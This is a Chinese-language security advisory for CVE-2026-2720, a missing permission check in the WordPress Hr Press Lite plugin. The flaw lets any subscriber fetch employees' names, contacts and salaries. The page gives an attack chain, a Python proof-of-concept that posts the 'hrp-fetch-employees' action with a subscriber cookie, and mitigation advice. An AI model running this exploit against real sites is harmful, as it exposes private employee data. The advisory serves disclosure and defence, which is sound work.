IPBUF安全漏洞报告
English
CVE-2026-2720 CVSS 6.5 中危

CVE-2026-2720 WordPress Hr Press Lite插件信息泄露漏洞

披露日期: 2026-03-21

漏洞信息

漏洞编号
CVE-2026-2720
漏洞类型
敏感信息泄露
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WordPress Hr Press Lite 插件

相关标签

WordPress信息泄露越权访问CVE-2026-2720插件漏洞AJAX

漏洞概述

WordPress Hr Press Lite 插件存在严重的安全隐患,其所有版本(包括1.0.2在内)均受影响。该漏洞的核心在于`hrp-fetch-employees` AJAX操作未实施适当的能力检查。这使得经过身份验证的攻击者,即便是权限极低的订阅者,也能绕过权限限制,非法获取员工的敏感资料。泄露的信息涵盖了员工的全名、电子邮箱、电话号码、薪资与费率、入职日期以及就业状态等关键隐私数据,对企业信息安全构成严重威胁。

技术细节

该漏洞属于典型的越权访问漏洞。在WordPress插件开发中,AJAX操作通常需要绑定特定的权限回调函数以验证用户角色。然而,Hr Press Lite插件在处理`hrp-fetch-employees`请求时,虽然在`includes/HRP_Action.php`中定义了回调函数,却遗漏了`current_user_can()`等关键权限验证步骤。这意味着,只要用户拥有有效的WordPress账户登录状态,无论其角色为何(如订阅者),均可调用该接口。攻击者利用此漏洞,只需向`/wp-admin/admin-ajax.php`端点发送包含`action=hrp-fetch-employees`参数的POST请求,服务器端脚本便会直接查询数据库并返回未经处理的敏感员工信息。由于无需管理员权限即可触发,该漏洞利用门槛极低,危害性高。

攻击链分析

STEP 1
步骤1:枚举与注册
攻击者识别出目标站点使用了Hr Press Lite插件,并在网站上注册一个最低权限(订阅者)账户。
STEP 2
步骤2:获取会话凭证
攻击者使用订阅者账户登录,浏览器保存WordPress的登录Cookie(如wordpress_logged_in_*)。
STEP 3
步骤3:构造恶意请求
攻击者向`/wp-admin/admin-ajax.php`发送POST请求,携带登录Cookie,并在请求体中包含参数`action=hrp-fetch-employees`。
STEP 4
步骤4:数据泄露
服务器端接收到请求后,由于缺乏权限检查,直接返回包含所有员工姓名、薪资、电话等敏感信息的JSON数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Attacker's authenticated session cookie (Subscriber level) cookies = { "wordpress_logged_in_xxx": "attacker_cookie_value_here" } # The vulnerable AJAX action payload = { "action": "hrp-fetch-employees" } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200: print("[+] Exploit successful!") print("[+] Sensitive Employee Data:") print(response.json()) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Hr Press Lite <= 1.0.2

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用Hr Press Lite插件。或者通过服务器端配置(如Apache/Nginx规则)阻断对`hrp-fetch-employees`动作的调用,直到应用补丁为止。此外,应审查受影响系统的员工数据访问日志,确认是否已发生数据泄露事件。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表